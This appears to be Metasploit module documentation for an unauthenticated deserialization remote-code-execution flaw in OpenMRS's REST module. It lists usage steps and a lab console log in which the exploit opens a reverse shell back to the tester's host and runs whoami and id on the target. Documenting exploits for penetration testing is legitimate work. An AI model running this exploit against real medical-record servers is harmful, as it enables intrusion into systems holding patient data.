Shelby Pace
70 lines
2.3 KiB
Markdown
70 lines
2.3 KiB
Markdown
## Vulnerable Application
|
|
|
|
OpenMRS is an open-source platform that supplies
|
|
users with a customizable medical record system.
|
|
|
|
There exists an object deserialization vulnerability
|
|
in the `webservices.rest` module used in OpenMRS Platform
|
|
for versions below `v2.24.0`. Unauthenticated remote code
|
|
execution can be achieved by sending a malicious XML payload
|
|
to a Rest API endpoint such as `/ws/rest/v1/concept`.
|
|
|
|
Vulnerable versions of the software can be found [here](https://sourceforge.net/projects/openmrs/files/releases/).
|
|
|
|
Tested on OpenMRS Platform `v2.1.2` and `v2.21` with Java
|
|
8 and Java 9.
|
|
|
|
## Verification Steps
|
|
|
|
1. Install the application
|
|
2. Start msfconsole
|
|
3. Do: ```use exploit/multi/http/openmrs_deserialization```
|
|
4. Do: ```set TARGETURI <uri>```
|
|
5. Do: ```set RHOSTS <ip>```
|
|
6. Do: ```run```
|
|
7. You should get a shell.
|
|
|
|
## Options
|
|
|
|
**ForceExploit**
|
|
|
|
Overrides the check result and runs the exploit.
|
|
|
|
## Scenarios
|
|
|
|
### Version of software and OS as applicable
|
|
|
|
```
|
|
msf5 > use exploit/multi/http/openmrs_deserialization
|
|
msf5 exploit(multi/http/openmrs_deserialization) > set rhosts 192.168.37.168
|
|
rhosts => 192.168.37.168
|
|
msf5 exploit(multi/http/openmrs_deserialization) > set targeturi /openmrs-standalone
|
|
targeturi => /openmrs-standalone
|
|
msf5 exploit(multi/http/openmrs_deserialization) > set lhost 192.168.37.1
|
|
lhost => 192.168.37.1
|
|
msf5 exploit(multi/http/openmrs_deserialization) > check
|
|
[*] 192.168.37.168:8081 - The target appears to be vulnerable. OpenMRS platform version: 2.1.2
|
|
msf5 exploit(multi/http/openmrs_deserialization) > run
|
|
|
|
[*] Started reverse TCP double handler on 192.168.37.1:4444
|
|
[*] Target is running OpenMRS
|
|
[*] Formatting payload
|
|
[*] Sending payload...
|
|
[*] Accepted the first client connection...
|
|
[*] Accepted the second client connection...
|
|
[*] Command: echo wKYK4x9ZOHJ37tm7;
|
|
[*] Writing to socket A
|
|
[*] Writing to socket B
|
|
[*] Reading from sockets...
|
|
[*] Reading from socket B
|
|
[*] B: "wKYK4x9ZOHJ37tm7\r\n"
|
|
[*] Matching...
|
|
[*] A is input...
|
|
[*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.168:45048) at 2019-11-21 14:13:09 -0600
|
|
|
|
whoami
|
|
space
|
|
id
|
|
uid=1000(space) gid=1000(space) groups=1000(space),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
|
|
```
|